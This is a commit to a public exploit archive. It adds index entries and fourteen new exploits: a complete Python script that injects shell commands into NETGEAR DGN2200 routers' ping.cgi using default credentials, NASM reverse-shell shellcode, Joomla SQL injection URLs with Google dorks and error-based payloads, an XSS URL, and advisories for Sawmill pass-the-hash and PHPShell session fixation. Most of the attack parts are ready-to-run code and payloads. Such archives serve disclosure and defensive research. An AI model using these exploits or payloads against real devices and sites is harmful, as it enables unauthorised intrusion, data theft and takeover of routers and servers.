DB: 2017-02-20

14 new exploits

Linux - Reverse Shell Shellcode (66 bytes)

Joomla! Component com_Joomlaoc - 'id' SQL Injection
Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection

Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection
Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection

Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload
Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload

Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting
Horde 3.3.5 - Cross-Site Scripting
Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection
Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection
Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection
Joomla! Component OS Property 3.0.8 - SQL Injection
Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection
Joomla! Component OS Services Booking 2.5.1 - SQL Injection
Joomla! Component Room Management 1.0 - SQL Injection
Joomla! Component Bazaar Platform 3.0 - SQL Injection
Joomla! Component Google Map Store Locator 4.4 - SQL Injection
Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection
NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution
Sawmill Enterprise 8.7.9 - Authentication Bypass
PHPShell 2.4 - Session Fixation
This commit is contained in:
Offensive Security 2017-02-20 05:01:17 +00:00
parent 2d72a9c8b9
commit ae0dd9fa7c
16 changed files with 614 additions and 5 deletions

View file

@ -15898,6 +15898,7 @@ id,file,description,date,author,platform,type,port
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -21643,7 +21644,7 @@ id,file,description,date,author,platform,type,port
9601,platforms/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,php,webapps,0
9602,platforms/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps,0
9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0
9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
9604,platforms/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0
9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0
9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - 'menu.php' Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0
@ -22939,7 +22940,7 @@ id,file,description,date,author,platform,type,port
12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0
12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
12113,platforms/php/webapps/12113.txt,"Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0
12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
@ -25626,7 +25627,7 @@ id,file,description,date,author,platform,type,port
19792,platforms/php/webapps/19792.txt,"Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps,0
19825,platforms/php/webapps/19825.php,"Shopware 3.5 - SQL Injection",2012-07-14,Kataklysmos,php,webapps,0
19964,platforms/php/webapps/19964.txt,"PHP-Nuke module (SPChat) - SQL Injection",2012-07-20,"Yakir Wizman",php,webapps,0
19829,platforms/php/webapps/19829.txt,"Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
19829,platforms/php/webapps/19829.txt,"Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0
19862,platforms/php/webapps/19862.pl,"WordPress Theme Diary/Notebook Site5 - Email Spoofing",2012-07-16,bwall,php,webapps,0
19863,platforms/php/webapps/19863.txt,"CakePHP 2.x < 2.2.0-RC2 - XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0
@ -27494,7 +27495,7 @@ id,file,description,date,author,platform,type,port
25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0
25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0
25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,multiple,webapps,0
33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - Administration Interface admin/cmdshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - Administration Interface admin/sqlshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 - showgallery.php Multiple Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0
@ -37300,3 +37301,16 @@ id,file,description,date,author,platform,type,port
41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
41383,platforms/php/webapps/41383.txt,"Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41384,platforms/php/webapps/41384.txt,"Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41385,platforms/php/webapps/41385.txt,"Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41386,platforms/php/webapps/41386.txt,"Joomla! Component OS Property 3.0.8 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41387,platforms/php/webapps/41387.txt,"Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41388,platforms/php/webapps/41388.txt,"Joomla! Component OS Services Booking 2.5.1 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41393,platforms/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0
41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0
41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,58 @@
#!/usr/bin/python
#Provides access to default user account, privileges can be easily elevated by using either:
# - a kernel exploit (ex. memodipper was tested and it worked)
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon along with the 2nd vuln)
#Pozdrawiam: Kornela, Komara i Sknerusa
import sys
import requests
#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
login = 'admin'
password = 'password'
def main():
if len(sys.argv) < 2 or len(sys.argv) == 3:
print "./netgearpwn.py <router ip>"
return
spawnShell()
def execute(cmd):
r = requests.post("http://" + sys.argv[1] + "/ping.cgi", data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping':"Ping", 'ping_IPAddr':"12.12.12.12; " + cmd}, auth=(login, password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"})
result = parseOutput(r.text)
return result
def spawnShell():
r = execute("echo pwn3d")
if any("pwn3d" in s for s in r) == False:
print "Something went wrong, is the system vulnerable? Are the credentials correct?"
return
while True:
cmd = raw_input("$ ")
r = execute(cmd)
for l in r:
print l.encode("utf-8")
def parseOutput(output):
yet = False
a = False
result = []
for line in output.splitlines():
if line.startswith("<textarea"):
yet = True
continue
if yet == True:
if line.startswith("</textarea>"):
break
result.append(line)
return result
if __name__ == "__main__":
main()

View file

@ -0,0 +1,71 @@
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/02/assignment-2b.html
global _start
section .text
_start:
; Socket
push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq
syscall
; Connect
xchg edi, eax
push rdx
mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002
not rbx
push rbx
mov al, 42
push rsp
pop rsi
mov dl, 16
syscall
; Dup 2
push 3
pop rsi
dup2loop:
mov al, 33
dec esi
syscall
loopnz dup2loop
; Execve
; rax and rsi are zero from the result of the last dup2 syscall and loop
push rax ; zero terminator for the following string that we are pushing
mov rbx, '/bin//sh'
push rbx
; store /bin//sh address in RDI
push rsp
pop rdi
cdq ; zero rdx
mov al, 59
syscall

View file

@ -8,4 +8,4 @@ This issue affects versions prior to Horde 3.3.6.
Note that additional products that use the Horde framework may also be vulnerable.
http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;sessid&gt;
http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>

17
platforms/php/webapps/41383.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component Joomloc-CAT v4.1.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomloc
# Date: 18.02.2017
# Vendor Homepage: http://www.joomloc.fr.nf/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-cat/
# Demo: http://www.joomloc.fr.nf/joomlocprocmpms/
# Version: 4.1.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=[SQL]
# # # # #

18
platforms/php/webapps/41384.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component Joomloc-Lite v1.3.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomloc
# Date: 18.02.2017
# Vendor Homepage: http://www.joomloc.fr.nf/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-lite/
# Demo: http://www.joomloc.fr.nf/joomloclite/
# Version: 1.3.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomloc&view=loc&layout=singleloc&site_id=[SQL]
# # # # #

17
platforms/php/webapps/41385.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component JomWALL v4.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_awdwall
# Date: 18.02.2017
# Vendor Homepage: http://dashbite.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/jomwall/
# Demo: http://demo-dashbite.com/
# Version: 4.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_awdwall&task=gethovercard&wuid=[SQL]
# # # # #

17
platforms/php/webapps/41386.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component OS Property v3.0.8 - SQL Injection
# Google Dork: inurl:index.php?option=com_osproperty
# Date: 18.02.2017
# Vendor Homepage: https://www.joomdonation.com/
# Software Buy: https://www.joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html
# Demo: http://osproperty.ext4joomla.com/
# Version: 3.0.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_osproperty&view=ltype&catIds[0]=[SQL]
# # # # #

17
platforms/php/webapps/41387.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component EShop v2.5.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_eshop
# Date: 18.02.2017
# Vendor Homepage: https://www.joomdonation.com/
# Software Buy: https://www.joomdonation.com/joomla-extensions/eshop-joomla-shopping-cart.html
# Demo: http://joomdonationdemo.com/eshop
# Version: 2.5.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_eshop&view=category&id=[SQL]
# # # # #

21
platforms/php/webapps/41388.txt Executable file
View file

@ -0,0 +1,21 @@
# # # # #
# Exploit Title: Joomla! Component OS Services Booking v2.5.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_osservicesbooking
# Date: 18.02.2017
# Vendor Homepage: https://www.joomdonation.com/
# Software Buy: https://www.joomdonation.com/joomla-extensions/joomla-services-appointment-booking.html
# Demo: http://osb.ext4joomla.com/
# Version: 2.5.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&task=default_showmap&vid=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=[SQL]
# Etc..
# # # # #

23
platforms/php/webapps/41389.txt Executable file
View file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: Joomla! Component Room Management v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_roommgmt
# Date: 18.02.2017
# Vendor Homepage: http://matamko.com/
# Software Buy: http://matamko.com/products/room-management/live-demo
# Demo: http://matamko.com/products/room-management/live-demo
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/room/book?tmpl=component&id=5&date=[SQL]
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=[SQL]
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=0&id=[SQL]
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# Etc...
# # # # #

23
platforms/php/webapps/41390.txt Executable file
View file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: Joomla! Component Bazaar Platform v3.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_bazaar
# Date: 18.02.2017
# Vendor Homepage: http://matamko.com/
# Software Buy: http://matamko.com/products/bazaar/live-demo
# Demo: http://matamko.com/products/bazaar/live-demo
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=[SQL]
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=[SQL]
# 1'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/index.php?option=com_bazaar&view=product&productid=[SQL]
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# Etc...
# # # # #

19
platforms/php/webapps/41391.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component Google Map Store Locator v4.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_googlemaplocator
# Date: 18.02.2017
# Vendor Homepage: http://matamko.com/
# Software Buy: http://matamko.com/products/google-map-store-locator/live-demo
# Demo: http://gtlocator4.demo.matamko.com/
# Version: 4.4
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?filter_to=a&filter_day=21-02-2017&filter_time=[SQL]
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# Etc...
# # # # #

20
platforms/php/webapps/41393.txt Executable file
View file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Joomla! Component Most Wanted Real Estate v1.1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_mostwantedrealestate
# Date: 18.02.2017
# Vendor Homepage: http://mostwantedrealestatesites.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/most-wanted-real-estate/
# Demo: http://demo.mostwantedrealestatesites.com/
# Version: 1.1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=&filter_a1minland=&filter_a1maxland=&filter_a1landtype=0&which_order=[SQL]
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=[SQL]
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=[SQL]
# Etc...
# # # # #

136
platforms/php/webapps/41396.txt Executable file
View file

@ -0,0 +1,136 @@
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt
[+] ISR: ApparitionSec
Vendor:
==================================
sourceforge.net/projects/phpshell/
phpshell.sourceforge.net/
Product:
==============
PHPShell v2.4
Vulnerability Type:
===================
Session Fixation
CVE Reference:
==============
N/A
Security Issue:
================
PHPShell does not regenerate the Session ID upon authentication, this can
potentially allow remote attackers to access parts of the application
using only a valid PHPSESSID if PHP.INI setting for
session.use_only_cookies=0.
Since an existing XSS vulnerability exists in PHPShell "
http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt"
the risk is
increased if an authenticated user clicks an attacker supplied link and the
attacker finds way to access or set the victims Cookie.
In 'phpshell.php' line 153 we see call to PHP function session_start();
After user authentication no call to "session_regenerate_id()" is made
leaving the authenticated session id same as pre-auth session id.
However, "session.use_only_cookies=1" is default since PHP 4.3.0, so to
exploit it would require that PHP.INI is set to session.use_only_cookies=0
on the victims system.
When accessing the application using the session fixation flaw and
attempting to run system command the application luckily redirects to login
form.
However, if a victim is actively changing directorys, reading files etc...
attackers may still be able to read current directory and files open
in the victims PHPShell console window.
Exploit/POC:
=============
1) Login to PHPShell run commands to CD to Windows directory and run DIR
command etc, then find and copy the PHPSESSID Cookie
2) Open a second browser (InternetExplorer) and access the application
cleanly for first time using the PHPSESSID in URL.
e.g.
http://VICTIM-IP/phpshell-2.4/phpshell.php?PHPSESSID=<STOLEN-SESSION-ID>
You should see what the authenticated victim now sees...
e.g.
Current Working Directory:
Change to subdirectory:
07/13/2009 08:51 PM 24,576 Microsoft.MediaCenter.iTv.Hosting.dll
11/20/2010 10:24 PM 147,968 Microsoft.MediaCenter.iTV.Media.dll
07/13/2009 08:52 PM 45,056 Microsoft.MediaCenter.ITVVM.dll
11/20/2010 10:24 PM 56,320 Microsoft.MediaCenter.Mheg.dll
11/20/2010 10:24 PM 114,688 Microsoft.MediaCenter.Playback.dll
11/20/2010 10:24 PM 1,572,864 Microsoft.MediaCenter.Shell.dll
11/20/2010 10:24 PM 241,664 Microsoft.MediaCenter.Sports.dll
11/20/2010 10:24 PM 327,168
Microsoft.MediaCenter.TV.Tuners.Interop.dll
11/20/2010 10:24 PM 2,596,864 Microsoft.MediaCenter.UI.dll
10/29/2011 12:23 AM 465,920 mstvcapn.dll
11/20/2010 10:24 PM 88,576 NetBridge.dll
07/13/2009 08:51 PM 106,496 RegisterMCEApp.exe
06/10/2009 04:04 PM 129,528 segmcr.ttf
etc...
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: No reply
Also, the INSTALL file "Bugs? Comments? Tracker System link" is HTTP 404
http://sourceforge.net/tracker/?group_id=156638
February 18, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c) HYP3RLINX -
ApparitionSec

View file

@ -0,0 +1,138 @@
[+] Credits: John Page AKA Hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.sawmill.net
Product:
========================
Sawmill Enterprise v8.7.9
sawmill8.7.9.4_x86_windows.exe
hash: b7ec7bc98c42c4908dfc50450b4521d0
Sawmill is a powerful heirarchical log analysis tool that runs on every
major platform.
Vulnerability Type:
===================================
Pass the Hash Authentication Bypass
CVE Reference:
==============
CVE-2017-5496
Security Issue:
=====================
Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an
attacker who gains access to the hashed user account passwords
can login to the Sawmill interface using the raw MD5 hash values, allowing
attackers to bypass the work of offline cracking
account password hashes.
This issue usually is known to affect Windows systems e.g. (NT Pass the
Hash/Securityfocus, 1997). However, this vulnerability can also
present itself in a vulnerable Web application.
Sawmill account password hashes are stored under LogAnalysisInfo/ directory
in "users.cfg".
e.g.
users = {
root_admin = {
username = "admin"
password_checksum = "e99a18c428cb38d5f260853678922e03"
email_address = ""
This config file is stored local to the Sawmill application. However, if an
attacker gains access to a backup of the config that is
stored in some other location that is then compromised, it can lead to
subversion of Sawmills authenticaton process.
Moreover, since 'users.cfg' file is world readble a regular non Admin
Windows user who logs into the system running sawmill can now grab
a password hash and easily login to the vulnerable application without the
needing the password itself.
How to test?
Sawmill running (default port 8988), log off Windows and switch to a
"Standard" Windows non Administrator user.
1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash.
2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash, Tada! your Admin.
Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no
salt.
e.g.
password: abc123
MD5 hash:
e99a18c428cb38d5f260853678922e03
Disclosure Timeline:
=====================================
Vendor Notification: January 7, 2017
CVE-2017-5496 assigned : January 20
Request status : January 26
Vendor: Fix avail later in year still no ETA
Inform vendor public disclose date
February 18, 2017 : Public Disclosure
Network Access:
===============
Remote
Impact:
======================
Information Disclosure
Privilege Escalation
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.